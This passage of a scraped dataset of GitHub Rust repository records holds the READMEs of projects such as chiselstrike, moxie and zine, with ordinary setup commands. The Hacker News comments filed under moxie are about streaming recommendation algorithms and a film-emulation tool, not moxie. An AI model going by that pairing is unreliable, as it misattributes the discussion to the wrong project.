? |\n\n\n## Ports and clones\n\n* [whatlang-ffi](https://github.com/greyblake/whatlang-ffi) - C bindings\n* [whatlanggo](https://github.com/abadojack/whatlanggo) - whatlang clone for Go language\n* [whatlang-py](https://github.com/cathalgarvey/whatlang-py) - bindings for Python\n* [whatlang-rb](https://gitlab.com/KitaitiMakoto/whatlang-rb) - bindings for Ruby\n* [whatlangex](https://github.com/pierrelegall/whatlangex) - bindings for Elixir\n\n## Donations\n\nYou can support the project by donating [NEAR tokens](https://near.org).\n\nOur NEAR wallet address is `whatlang.near`\n\n## Derivation\n\n**Whatlang** is a derivative work from [Franc](https://github.com/wooorm/franc) (JavaScript, MIT) by [Titus Wormer](https://github.com/wooorm).\n\n## License\n\n[MIT](https://github.com/greyblake/whatlang-rs/blob/master/LICENSE) \u00a9 [Sergey Potapov](http://greyblake.com/)\n\n\n## Contributors\n\n- [greyblake](https://github.com/greyblake) Potapov Sergey - creator, maintainer.\n- [Dr-Emann](https://github.com/Dr-Emann) Zachary Dremann - optimization and improvements\n- [BaptisteGelez](https://github.com/BaptisteGelez) Baptiste Gelez - improvements\n- [Vishesh Chopra](https://github.com/KarmicKonquest) - designed the logo\n- [Joel Natividad](https://github.com/jqnatividad) - support of Tagalog\n- [ManyTheFish](https://github.com/ManyTheFish) - crazy optimization\n- [Kerollmops](https://github.com/Kerollmops) Cl\u00e9ment Renault - crazy optimization\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "chiselstrike/chiselstrike", "link": "https://github.com/chiselstrike/chiselstrike", "tags": ["framework", "javascript", "runtime", "typescript", "backend", "rust"], "stars": 822, "description": "ChiselStrike abstracts common 
backend components like databases and message queues, and lets you drive them from a convenient TypeScript business logic layer", "lang": "Rust", "repo_lang": "", "readme": "![banner](imgs/logo.png)\n\n---\n\n[![Build Status](https://github.com/chiselstrike/chiselstrike/workflows/Rust/badge.svg?event=push&branch=main)](https://github.com/chiselstrike/chiselstrike/actions)\n[![License](https://img.shields.io/badge/license-Apache%202.0-blue)](https://github.com/chiselstrike/chiselstrike/blob/master/LICENSE)\n[![Discord](https://img.shields.io/discord/933071162680958986?color=5865F2&label=discord&logo=discord&logoColor=8a9095)](https://discord.gg/GHNN9CNAZe)\n[![Twitter](https://img.shields.io/twitter/follow/chiselstrike?style=plastic)](https://twitter.com/chiselstrike)\n\n## What is ChiselStrike?\n\nChiselStrike is a complete backend bundled in one piece: your one-stop shop for all\nyour backend needs, powered by TypeScript.\n\n## Why ChiselStrike?\n\nPutting together a backend is hard work. Databases? ORM? Business logic? Data\naccess policies? And how to offer all of that through an API?\n\nLearning all that, plus figuring out the interactions between all the\ncomponents, can be a drain on an application developer's time. Low-code\nbased approaches allow for super fast prototypes, but as you need to scale and\nevolve, the time you saved on the prototype is now owed with interest in refactorings,\nmigrations, etc.\n\nChiselStrike provides everything you need to handle and evolve your backend,\nfrom the data layer to the business logic, allowing you to focus on what you\ncare about \u2013\u00a0your code, rather than worrying about database schemas,\nmigrations, or even database operations.\n\nAll driven by TypeScript, so your backend can evolve as your code evolves.\n\n## How does that work?\n\nChiselStrike keeps things as close as possible to pure TypeScript, and a\n[translation\nlayer](https://blog.chiselstrike.com/my-other-database-is-a-compiler-10fd527a4d78)\ntakes care of index creation, database query generation, and even communicating\nwith external systems like Kafka.\n\nInternally, ChiselStrike uses a SQLite database so there's no need to set up\nany external data layer (although it is possible to hook up an external\nPostgres-compatible database). 
ChiselStrike also abstracts other concepts\ncommon to complex backends, like\n[Kafka-compatible](https://blog.chiselstrike.com/dear-application-developer-how-far-can-you-really-go-without-a-message-queue-d9e5385fab64)\nstreaming platforms.\n\n![](imgs/diagram.png)\n\n## Quick start\n\nTo get a CRUD API working in 30 seconds or less, first create a new project:\n\n```console\nnpx -y create-chiselstrike-app@latest my-app\ncd my-app\n```\n\nAdd a model by writing the following TypeScript code to `models/BlogComment.ts`:\n\n```typescript\nimport { ChiselEntity } from \"@chiselstrike/api\"\n\nexport class BlogComment extends ChiselEntity {\n content: string = \"\";\n by: string = \"\";\n}\n```\n\nAdd a route by writing the following TypeScript code to `routes/comments.ts`:\n\n```typescript\nimport { BlogComment } from \"../models/BlogComment\";\nexport default BlogComment.crud();\n```\n\nStart the development server with:\n\n```console\nnpm run dev\n```\n\nThis server will provide a CRUD API that you can use to add and query instances\nof the BlogComment entity.\n\n```console\ncurl -X POST -d '{\"content\": \"First comment\", \"by\": \"Jill\"}' localhost:8080/dev/comments\n\ncurl localhost:8080/dev/comments\n```\n\nFor a more detailed tutorial about how to get started with ChiselStrike, follow\nour [Getting started tutorial](https://docs.chiselstrike.com/tutorials/getting-started/).\n\n### Is ChiselStrike a database?\n\nNo. The [founding team at ChiselStrike](https://chiselstrike.com/about-us) have written databases from scratch before and\nwe believe there are better things to do in life, like pretty much anything else. ChiselStrike comes bundled with SQLite,\nproviding developers with a zero-conf *relational-like abstraction* that allows one to think of backends\nfrom the business needs down, instead of from the database up.\n\nInstead, you can think of ChiselStrike as a big pool of global shared memory.\nThe data access API is an integral part of ChiselStrike and offers developers a way to just code, without\nworrying about the underlying database (any more than you worry about what happens at each level of the memory hierarchy;\nsome people do, but most people don't have to!).\n\nIn production, ChiselStrike can also hook into a\n[Kafka-compatible](https://blog.chiselstrike.com/dear-application-developer-how-far-can-you-really-go-without-a-message-queue-d9e5385fab64)\nstreaming platform when available, and transparently drive both that and the database from a unified TypeScript/JavaScript abstraction.\n\n### Is ChiselStrike an ORM?\n\nKind of. ChiselStrike has some aspects that overlap with traditional ORMs, in that it allows you to access database abstractions\nin your programming language. However, in traditional ORMs you start from the database, and export it up. 
Changes\nare done to the database schema, which is then bubbled up through *migrations*, and elements of the database invariably leak\nto the API.\n\nChiselStrike, on the other hand, starts from your code and automates the decisions needed to implement that into the database, much\nlike what a [compiler](https://blog.chiselstrike.com/my-other-database-is-a-compiler-10fd527a4d78) would do.\n\nLet's look at [ChiselStrike's documentation](https://docs.chiselstrike.com/Intro/first) for an example of what's needed to create a comment on a blog post:\n\n```typescript\nimport { ChiselEntity } from \"@chiselstrike/api\"\n\nexport class BlogComment extends ChiselEntity {\n content: string = \"\";\n by: string = \"\";\n}\n```\n\nThe first thing you will notice is that there is no need to specify how those things map to the underlying database. No tracking\nof primary keys, column types, etc.\n\nNow imagine you need to start tracking whether this was created by a human or a bot. You can change your model\nto say:\n\n```typescript\nimport { ChiselEntity } from \"@chiselstrike/api\"\n\nexport class BlogComment extends ChiselEntity {\n content: string = \"\";\n by: string = \"\";\n isHuman: boolean = false;\n}\n```\n\nand that's it! There are no migrations and no need to alter a table.\n\nFurthermore, if you need to find all blog posts written by humans, you\ncan just write a lambda instead of trying to craft a database query in TypeScript:\n\n```typescript\nconst all = await BlogComment.findMany(p => p.isHuman);\n```\n\n### Is ChiselStrike a TypeScript runtime?\n\nChiselStrike includes a TypeScript runtime - the fantastic and beloved [Deno](https://github.com/denoland/deno). That's the last piece of the puzzle\nwith the data API and the database bundles. That allows you to develop everything locally from your laptop and integrate\nwith your favorite frontend framework. Be it Next.js, Gatsby, Remix, or any others - we're cool with all of them!\n\n### That's all fine and all, but I need more than that!\n\nWe hear you. No modern application is complete without authentication and security. ChiselStrike integrates with [next-auth](https://next-auth.js.org/)\nand allows you to specify authentication entities directly from your TypeScript models.\n\nYou can then add a policy file that details which fields can be accessed, and which endpoints are available.\n\nFor example, you can store the blog authors as part of the models,\n\n```typescript\nimport { ChiselEntity, AuthUser } from \"@chiselstrike/api\"\n\nexport class BlogComment extends ChiselEntity {\n content: string = \"\";\n @labels(\"protect\") author: AuthUser;\n}\n```\n\nand then write a policy saying that the users should only be able to see the posts that they themselves\noriginated:\n\n```yaml\nlabels:\n - name: protect\n transform: match_login\n```\n\nNow your security policies are declaratively applied separately from the code, and you can easily grasp what's\ngoing on.\n\n## In Summary\n\nChiselStrike provides everything you need to handle your backend, from the data layer to the business logic, wrapped in powerful abstractions that let you just code and not worry about handling databases schemas, migrations, and operations again.\n\nIt allows you to declaratively specify compliance policies around who can access the data and under which circumstances.\n\nYour ChiselStrike files can go into their own repo, or even better, into a subdirectory of your existing frontend repo. 
You can code your presentation and data layer together, and turn any frontend framework into a full-stack (including the database layer!) framework in minutes.\n\n## Contributing\n\nTo build and develop from source:\n\n```console\ngit submodule update --init --recursive\ncargo build\n```\n\nThat will build the `chiseld` server and `chisel` utility.\n\nYou can now use `create-chiselstrike-app` to install a local version of the API:\n```console\nnode ./packages/create-chiselstrike-app --chisel-version=\"file:../packages/chiselstrike-api\" my-backend\n```\n\nAnd then replace instances of `npm run` with direct calls to the new binaries. For example, instead of\n`npm run dev`, run\n\n```console\ncd my-backend\nnpm i esbuild\n../target/debug/chisel dev\n```\n\nAlso, consider:\n\n[Open (or fix!) an issue](https://github.com/chiselstrike/chiselstrike/issues) \ud83d\ude47\u200d\u2642\ufe0f\n\n[Join our discord community](https://discord.gg/GHNN9CNAZe) \ud83e\udd29\n\n[Start a discussion](https://github.com/chiselstrike/chiselstrike/discussions/) \ud83d\ude4b\u200d\u2640\ufe0f\n\n\n## Next steps?\n\nOur documentation (including a quick tutorial) is available at [docs.chiselstrike.com](https://docs.chiselstrike.com)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "tyrchen/geektime-rust", "link": "https://github.com/tyrchen/geektime-rust", "tags": [], "stars": 820, "description": "The code repository for my Geekbang Time Rust course, updated as the course progresses", "lang": "Rust", "repo_lang": "", "readme": "# geektime-rust\n\nThe code repository for my Geekbang Time course, [Rust Lesson 1](https://time.geekbang.org/column/intro/100085301), updated as the course progresses\n\n![rust Lesson 1](images/rust_qr.jpg)", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "anp/moxie", "link": "https://github.com/anp/moxie", "tags": ["rust", "ui", "declarative-ui", "incremental"], "stars": 820, "description": "lightweight platform-agnostic tools for declarative UI", "lang": "Rust", "repo_lang": "", "readme": "# moxie\n\n![crates.io](https://img.shields.io/crates/v/moxie)\n![License](https://img.shields.io/crates/l/moxie.svg)\n[![codecov](https://codecov.io/gh/anp/moxie/branch/main/graph/badge.svg)](https://codecov.io/gh/anp/moxie)\n\n## More Information\n\nFor more information about the moxie project, see the [website](https://moxie.rs).\n\n## Contributing and Code of Conduct\n\nSee [CONTRIBUTING.md](CONTRIBUTING.md) for overall contributing info and [CONDUCT.md](CODE_OF_CONDUCT.md)\nfor the project's Code of Conduct. The project is still early in its lifecycle but we welcome\nanyone interested in getting involved.\n\n## License\n\nLicensed under either of\n\n * [Apache License, Version 2.0](LICENSE-APACHE)\n * [MIT license](LICENSE-MIT)\n\nat your option.\n", "readme_type": "markdown", "hn_comments": "Frame rate probablyAnd... it's back online, supported by Ben's Bites, my favorite AI newsletter!\nhttps://bensbites.beehiiv.com/url forwarding is broken, you can use https://www.gptflix.aiRecommendation algorithms maximize the time you stay and interact with the platform.\nAs long as you stay on the platform and consume content its working.Its a bit the same as dating algorithms. 
If the algorithm was to good there would be no paying users of the service.IMO Netflix and Amazon Prime's problem is they don't surface their good content enough. They mix it with their shitty content. They should make it stand out. HBO are good at this. When they make something good, that they know is good, they will rub your face in it with large high quality images.I don't have time to shift out the good from the bad with Netflix.I have thought for years Netflix (for me, at least) would benefit massively from a \"never show me this show again\" button.I continually see the same bunch of shows when browsing that I will never, ever watch. They take up space and add to cognitive load and ultimately just annoy me each time I see them in the list.I'm sure this weighting would also be very useful from an algorithmic recommendations view as well.I actually went back to pirating movies/shows and host them on Plex.I sure have a much smaller collection than any streaming service, but it's actually all content I like, and I actually watch stuff instead of just browsing for 20min.For Amazon the issue for me has always been that aside from the things I shop for myself I get asked to buy things for other people or presents for family membersAmazon doesn't know who I bought something for so making sense of why I have bought 4 padlocks (my father in law), a set of sauce pans (wife), a light novel (myself) and rechargeable batteries (myself)For me personally, the recommendation engines choose the wrong aspects of shows that I like. They focus too much on genre, and not enough on writing qualities, variety, surprise, etc. Just because I liked one \u201cgritty suspenseful murder mystery\u201d (or whatever the genre is) does not mean I will like another! The execution could be wildly uneven in different programs that fall in the same subject matter bucket. 
I\u2019d rather see a recommendation that can figure out my tastes across genres.Maybe they push content that is cheaper to license optimizing for some sort of license-cost-per-viewer-hour metricits also possible they wont show you content you really want because its licensing is expensive, and instead they nudge you to content with higher % rev splitI got a tip from someone here and shifted to tracking what I want to watch with a seperate system trakt.tv.This lets it recommend across different services and removes incentives to promote their own content (I'm assuming someone at Amazon and Netflix is trying to goose their own stats by boosting the content they self create, or that they pay the least for)A link (and a free recommendation for an interesting show):https://trakt.tv/shows/giri-hajiIt lets you do nerdier searches like by director, writer, actor and similar to openlibrary.org it has some weird old stuff too.Is it thinkable that after \"hundreds of hours binging series and movies\" you have simply exhausted the options?Me, I haven't found a second The Wire yet, no matter how often a recommender claimed I have.If you are looking for movie recommendations, nothing beats movielense https://movielens.orgBecause priority number one is getting you to watch their originals, so that you will keep subscribing as the market for movies produced outside the streaming services gets more competitive.The big events gets featured on the home page, for anything you are probably better of searching for directors or reading reviews, and then finding where you can see it.Because it's profitable to recommend shit.For Netflix's DVD service, pre-streaming, their recommendation system was awesome. You know, the one where they had the contests and paid $1M to any group that could do better by some percentage?IMO, they don't use anything like that now for streaming. It's as others have said: this is what we want you to watch, not what you necessarily will like.I think Netflix needs an \"I really don't like this or programmes like it\" option....come to think of it so does YouTube.I'd love to be able to search for a particular genre and exclude everything that comes up.As someone that has worked within one of these orgs, it's because the recommendation system has been captured by contract negotiations and forced merchandising. You are not seeing things they think you would like. You are seeing the things they want you to watch.As others have mentioned, part of the goal is to induce you towards the service's self-made programming. They're rolling the dice that you will get hooked on something if they show you enough options, and your time spent searching for content (as long as it doesn't lead to an unsubscribe) is cheaper for them than time spent consuming content.FWIW, Spotify has similar issues in that they can't seem to figure out that new music from artists I'm \"following\" should be a slam dunk for the \"new music for you\" list.Their goal is to keep you subscribed, not to keep you entertained.They know they don\u2019t have enough premium content to keep you as a subscriber if that\u2019s all you watch. That kind of content usually costs a ton to create. So they need to have you watch filler content as well. And just like social media companies have taken advantage of the slot machine effect to increase addictiveness, so too do streamers. 
If everything you watch is good, you\u2019ll end up watching less and be more likely to cancel.You\u2019re assuming that the goal of a recommendation algorithm is to recommend the thing you\u2019d most want to watch at that specific moment. It\u2019s not. The goal is to maximize their retention. It\u2019s amazing how many of life\u2019s annoyances become instantly explainable when you realize that your interests are not aligned with those of the companies you\u2019re dealing with. Your happiness will always be a secondary concern to their profits.maybe you don't want to watch tvRead an article about how Netflix stages in house CDN \"boxes\" directly in key ISP locations, directly on the switch. Certain high ranking shows are spread through the CDN for responsiveness. Some of the recommended shows are the ones staged close to the watcher to eliminate lag. https://about.netflix.com/en/news/how-netflix-works-with-isp...Totally agree, that's why I gave up on it myself and created an aggregator.https://tomatotree.tvMy feeling is that Payola is most likely the reason why the recommendation algorithms are so bad rn.A big problem on Netflix is that they don't use the original poster or description for movies, instead coming up with their own. I find that these generally don't do movies justice.These services get paid to promote content. Did you think they are going to promote legit content?Maybe the problem is that they don't carry more of the content that you like?If you spent 20 mins looking, it's not their recommendation system that's failing. It's that you don't like their content (or how their content is portrayed).The recommendation system is the thing that shows you stuff without you needing to browse for 20 mins.Maybe recommendations are harder than we think because our tastes are too arbitrary and unpredictable. Maybe overlapping with someone else's tastes actually predicts nothing about whether there are any more places we will overlap, so it's not the simple data processing problem that we wish it to be.I've tried all sorts of \"people who liked X also enjoyed Y\" book and movie lists and it never seems any better than a generic list of decent books and movies.One of my favorite movies is The Arrival. To me, it's one of the best love stories ever told. Yet when I meet other people who really liked the movie, that wasn't the main draw for them. Perhaps it was the intrigue of the time travel or watching interesting characters navigate a complex conflict or perhaps they liked the provocative questions that it explores.Perhaps two people liking The Arrival says little about what they have in common at all, thus there's actually no data to go off beyond recommending both parties more critically acclaimed movies. I suspect that this might be the cold reality of recommendations.Honestly, I have yet to see a recommendation system that works very well.contrasting whit YouTube or tiktok is harder to Know why people like series ,less content, series become good after 40 minutes, people let their content run, do you want a background series or are u seeing in the momentfully ckncentrated, lees feedback look all the way downEdit: are you seeing alone or whit otherYou are asking for recommendations and they probably don\u2019t have anything. They\u2019re not going to say that. So you get things you don\u2019t want and things you have already seen.All streaming platforms i tried have this problem. Maybe the ranking of shows is commercially funded? Also annoying: netflix shows multiple cover images. 
Most annoying automatic playback of preview (including sound) in the menu.When I was growing up every kid watched more or less the same cartoons and played the same games. Life was simpler.Now as an adult there's too much out there and too little time.I suspect that this is a big part of why people feel there's nothing good to watch.Something else conspicuously missing from these services is a checkbox to make it never show me something again. Why do I have to scroll through an endless line of \"nope\", \"nope\", \"nope\", \"definitely not\", \"no\" every night, then look at all the same stuff tomorrow? Does someone get paid when I have to sacrifice a brain cell for each of these minor decisions?I do believe they have some kind of \"monetization\" going on regarding what they recommend you. Even YouTube apparently.They suggest the same thing over and over under \"different\" categories. I they go try to force \"popular\" content on you.One of the reasons I made this joke/rant projecthttps://victorribeiro.com/recommendation/Yeah. I especially find it interesting when Netflix says something you couldn't pay me to watch is a 92% match with my profile (or however they phrase it).But part of the problem the algorithm has is that content is of very uneven quality. I look at very recent things that, a few years ago, I would have wanted to see, and scroll on by. The first Avengers movie? Kind of rushed but acceptable. Thor Love and Thunder? Garbage. (Not Netflix examples, just examples)We want to see new content but have learned from recent experience that it's not worth the trouble. The algorithm simply can't understand that.Human beings cannot make good recommendations most of the time. What makes you think an algorithm can?My major problem with almost all recommendation engines and add-ons is that most of the time I want a recommendation that is orthogonal to the last thing I watched.If I just watched a Japanese yakuza crime thriller I don't want you to recommend another Japanese yakuza crime thriller. Give me something as good as what I just watched but different. But that's me. Many people just want to watch Hallmark Christmas romances until their heads explode.That's probably why I still use Criticker. Because it gives you one choice across multiple genres.https://www.criticker.com/Mass media platforms are very shallow when it come to \"managing personal information\". Netflix is a disaster in that regard. and yes this kind of UI works for the majority: To be honest, the average person, normally content with switching on a TV, couldn\u2019t care less.Stop relying on recommendations and figure out some humans that curateMy advice: Buy basic notebook, buy basic pen, and just start. It's easier to do that on paper - it removes all the digital distractions. Start with an intention to write something every day, no matter how long, with the ultimate goal to write at least one page daily. Use ChatGPT for ideas to write about if you can't find anything yourself (\"Give me 3 concrete ideas to write about in my journal\").> Linux support available for Studio license holders.Apparently using a free OS implies one is doing a \u201chigh-budget production\u201d and thus demands 5x cost. Of course the \u201clite\u201d version does not support Linux at all.As a photographer, emulation like this is of great interest to me. 
Like in cinematography, film is often held in high regard in photography with the caveat that it isn't even remotely as flexible as digital options.Have you considered creating a parallel product as an Adobe Lightroom plugin and/or a standalone app for still images?I'm getting \"Main.Sudo.Error error 1.\" when I try to install Filmbox Lite on Windows.\nI didn't try using it on my Mac yet.Related:Filmbox \u2013 Physically accurate motion picture film emulation - https://news.ycombinator.com/item?id=25367371 - Dec 2020 (49 comments)Have you all been hugged to death by any chance? No luck with email for the lite version. Seriously impressive results, can't wait to give it a go![dead]> It's been used in huge movies like \"Everything Everywhere All At Once\".An odd question, but I always wondered how do movie-related product developers learn about where their tool is used.Can you tell how it happened in your case?(The product looks fantastic.)This is cool, technologically speaking, but not sure I'd ever want movies to use it. I particularly don't want film grain, motion blur, low 24 FPS framerate, depth of field, chromatic aberration, etc in the movies and shows I watch.The skeuomorphic user interface below \"A tool for purists and mad scientists alike\" is really nice, but I doubt that is really how the app looks like.Can you discuss the technical details of how this was implemented? From a high level perspective, I can imagine it involves creating a 3d LUT from a color chart.Neat product. I know I'm asking in the worst possible place, but it'd be really cool if someone made some ShaderToy demos that do the same thing as a post-processing step.What's the difference between this and Dehancer?Cool software though not something I would pay for.If you're interested in getting most of this effect for free I highly recommend using the venerable Hald CLUT library found here: https://github.com/cedeber/hald-clutThese are lookup tables made using film scans and do a damn good job of emulating the film \"feel\" especially when used with HDR input without burnt highlights or crushed blacks.I personally recommend RawTherapee for photo editing, which includes native support for these.To further emulate the effect you can use a film grain overlay (hundreds available one google away) and a color-weighted bloom filter.ffmpeg and OBS also natively support this LUT format, I'm sure there are ways to use them in the FOSS video editing suites as well, but I basically do everything in ffmpeg commandline nowadays so I don't have firsthand experience.How does this compare to my Filmulator, which basically runs a simulation of stand development?https://filmulator.org(I've been too busy on another project to dedicate too much time to it the past year, and dealing with Windows CI sucks the fun out of everything, so it hasn't been updated in a while\u2026)Sujauddin RoyOn the front page of the site, something that could add to the compelling side-by-side comparison between Filmbox and real film is to show a 3rd image/synced clip, the digital image starting point, without any manipulation. (and hence the value add of Filmbox -- because as it is now of course it looks like the footage is identical, which is your point. But showing 2 basically identical clips doesn't add much).Maybe show the buildup of layers? That would be really interesting.Please please please please make something for CaptureOneDoes anyone the source of the movie sequences from the Filmbox presentation page? Thanks!Film simulations are cool. 
While I always take RAW images, I often use the builtin film simulation bracketing of my Fuji X-Systems to generate three JPEGs at the same time. This often gives me nice JPEGs which I can immediately pass on to family and friends, who view them on the smartphones or tablets and are happy without me doing time consuming RAW processing.Interestingly you can generate those simulations later in camera too while reviewing your images. And Darktable has some Fuji film simulation recipes builtin too for a start.Last but not least some sites, for example https://fujixweekly.com/, publish and review various film simulation recipes.http://www.cinegrain.com/These guys actually filmed every film stock and offer a similar thing. Think their stuff is used in all the big movies.Thank you for making it work with Davinci resolve[dead]\"Whatever you now find weird, ugly, uncomfortable and nasty about a new medium will surely become its signature. CD distortion, the jitteriness of digital video, the crap sound of 8-bit - all of these will be cherished and emulated as soon as they can be avoided. It\u2019s the sound of failure: so much modern art is the sound of things going out of control, of a medium pushing to its limits and breaking apart. The distorted guitar sound is the sound of something too loud for the medium supposed to carry it. The blues singer with the cracked voice is the sound of an emotional cry too powerful for the throat that releases it. The excitement of grainy film, of bleached-out black and white, is the excitement of witnessing events too momentous for the medium assigned to record them.\"- Brian EnoThose results look excellent.\nI'm trying to gauge whether something like this could potentially work in realtime, i.e. in games.\nI know it inevitably depends on hardware, resolution, settings, etc but do you have a ballpark figure for how long it takes to apply this to a frame?\n(And does it have a temporal aspect which requires access to frame N+k to render frame N?)Wonder how you differentiate yourselves from others in the space like Dehancer (which I find excellent, and is half the price), or older players like FilmConvert?Out of curiosity, is it normal for the Mac-only (until now) software in the film industry to get any traction like this one has?Something like this, but for VHS (aka something better than a simple filter), would be amazingAlways loved your software, glad to see you here. Polished and on point for 99% of my DIT use cases.Lattice being particularly close to heart. Thanks!Not sure how many people shoot film here, but I could have one look at the lite version processing and say this is just an emulation, especially in the shadows. The grain is predictable unlike \"real\" film.Funny that people will spend so much time, money and effort in making digital photos look like film, but refuse to shoot film. Just sad. :(As an artist and shader geek, I just want to say that this looks awesome. I'd love to see that blog post on Swift + Electron.Very light on detail. Is it different than just processing raw footage with already available fully free, high quality film emulation CLUTs and adding some grain? (Also I can't believe anyone would use everything everywhere all at once as a selling point, easily one of the worst movies I had to endure lately)I'm an old guy...in my 60s. I grew up with film and love the look of old movies. But this is 2023. Why are we still hanging on to a \"look\" that peaked in the 50s and 60s? Technology moves on.I mean, I get it. 
People are stubborn in their ways. They don't like change. It's SUBJECTIVE that someone may not like the look of something. But it drives me batty when people want their subjective opinion somehow presented as \"fact\". \"Based on empirical data\". Okay...so?A part of me think this is great, I love how film look.. Another part of me hates the idea, that something merely _looks_ like a thing, rather than _being_ the thing.. Can't explain why.. Especially since I can't watch film anywhere anyway, not even in cinema anymore..Are there any demos showing a side-by-side comparison of raw footage versus post-processing by Filmbox? I'd be interested to see the difference.As pro photographer and video producer, I use grain quite a lot. Subtle, almost non visible. It reduce artificial digital clean look that modern cameras gave us and also deband critical gradients.BUT... It is not usable for YouTube. Compression basically delete grain just like that. It is visible on vimeo. So it's good to think about it before buying and using any kind of extra grain.This is awesome![dead]As a photographer I am very much interested. I have enrolled in the license, then got a link to download a separate software, which then requires my password to install something into launchd. And it's not yet the Filmbox itself.So, at this point I had to abandon the installation which sucks because I really wanted to try it.Is there a pricing for students or people who just want to make their videos look cool for their families and friends? Unfortunately I really like the effect but can\u2019t afford this is a hobbyist.https://i.imgur.com/fTySVgd.pngIs it just me or are the expressions shown in these comparisons not identical? The top one looks like a smirk to me. The bottom looks more somber?Maybe the comparison videos are not synchronized perfectly? Or is it something more technically concerning?> It's been a huge rewrite to get this working on Linux and Windows from our original Mac and Metal code.Would be interested to read more about the technical details in a blog post.Did you end up porting your Metal code to something else which is then translated into Vulkan, Metal, DX12? Or do you now maintain your original Metal code alongside ports to Vulkan and DX12? Or something else?If you were to start another project today, would you go the same route of Metal first and then whatever else you did? 
Or would you go directly to the way that you are currently doing it?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "wormtql/genshin_artifact", "link": "https://github.com/wormtql/genshin_artifact", "tags": ["genshin-impact", "rust", "vue", "wasm", "webassembly"], "stars": 819, "description": "Mona's Fortune Teller | Genshin Impact | Artifact combinations | Artifact potential. Multi-directional automatic artifact combination, multi-directional artifact potential and scoring, Genshin Impact artifacts assessment, artifacts auto combination, artifacts statistics, artifacts potential, and more.", "lang": "Rust", "repo_lang": "", "readme": "# Mona's Fortune Teller\nThis is my personal translation, so it's likely not correct\nAutomatic artifact combination for Genshin Impact, [website](https://www.genshin.art)\nOther languages:\n[English](./README_en.md)\n[Chinese](./README.md)\n## Introduction\nAutomatic artifact combination for Genshin Impact\n## Features\n+ Supports all characters and weapons\n+ Different characters use different optimization targets\n+ ...\n## Usage guide\n- How much attack power can my artifacts reach?\n- How do I get the best defense and attack power?\n- ...\n## Run locally\n```\nnpm run serve\n```", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "zineland/zine", "link": "https://github.com/zineland/zine", "tags": ["magazine", "zine", "ssg", "static-site-generator", "rust", "rust-lang"], "stars": 818, "description": "Zine - a simple and opinionated tool to build your own magazine.", "lang": "Rust", "repo_lang": "", "readme": "
\n\n# zine\n\n[![Crates.io](https://img.shields.io/crates/v/zine.svg)](https://crates.io/crates/zine)\n![Crates.io](https://img.shields.io/crates/d/zine)\n[![license-apache](https://img.shields.io/badge/license-Apache-yellow.svg)](./LICENSE)\n\nZine - a simple and opinionated tool to build your own magazine.\n\nhttps://zineland.github.io\n\n- Mobile-first.\n- Intuitive and elegant magazine design.\n- Best reading experiences.\n- Theme customizable, extend friendly.\n- RSS Feed supported.\n- Open Graph Protocol supported.\n- Article topic supported.\n- I18n and l10n supported.\n- Build into a static website, hosting anywhere.\n\n## Installation\n\n`cargo install zine`\n\nor `brew install zineland/tap/zine`\n\nor `brew tap zineland/tap`, then `brew install zine`\n\n## Get Started\n\nRun `zine new your-zine-site`, you'll get following directory:\n\n```\n$ tree your-zine-site\nyour-zine-site\n\u251c\u2500\u2500 content # The content directory your issues located\n\u2502 \u2514\u2500\u2500 issue-1 # The first issue directory\n\u2502 \u251c\u2500\u2500 1-first.md # The first markdown article in this issue\n\u2502 \u2514\u2500\u2500 zine.toml # The issue Zine config file\n\u2514\u2500\u2500 zine.toml # The root Zine config file of this project\n\n2 directories, 3 files\n```\n\nRun `zine serve` to preview your zine site on your local computer:\n\n```\n$ cd your-zine-site\n\n$ zine serve\n\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557\u2588\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\n\u255a\u2550\u2550\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\n \u2588\u2588\u2588\u2554\u255d \u2588\u2588\u2551\u2588\u2588\u2554\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557\n \u2588\u2588\u2588\u2554\u255d \u2588\u2588\u2551\u2588\u2588\u2551\u255a\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\n\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n\nlistening on http://127.0.0.1:3000\n```\n\nRun `zine build` to build your zine site into a static website:\n\n```\n$ cd your-zine-site\n\n$ zine build\nBuild success! 
The build directory is `build`.\n```\n\n## Some cool magazines powered by Zine\n\n- [https://zineland.github.io](https://zineland.github.io) The zine documentation is built by zine itself.\n- [https://rustmagazine.org](https://rustmagazine.org) The Rust Magazine.\n- [https://2d2d.io](https://2d2d.io)\n- [https://o11y.cn](https://o11y.cn)\n- [https://thewhitepaper.github.io](https://thewhitepaper.github.io)\n\n## Documentation\n\n- [Getting started](https://zineland.github.io/getting-started)\n- [Customization](https://zineland.github.io/customization)\n- [Code blocks](https://zineland.github.io/code-blocks)\n- [Advanced](https://zineland.github.io/advanced)\n\n## TODO\n\n- [x] Support RSS Feed\n- [x] Support render OGP meta\n- [x] Support l10n\n- [x] Support sitemap.xml\n- [x] Support code syntax highlight\n- [x] Support table of content\n- [x] Support i18n\n- [x] `zine serve` support live reload\n- [x] Support article topic\n\n## License\n\nThis project is licensed under the [Apache-2.0 license](./LICENSE).\n", "readme_type": "markdown", "hn_comments": "In fact, the way that most of the privacy-friendly analytics tools advertise their services isn't compliant with GDPR either, as there's a broad consensus that third-party based analytics (even without cookies) cannot be 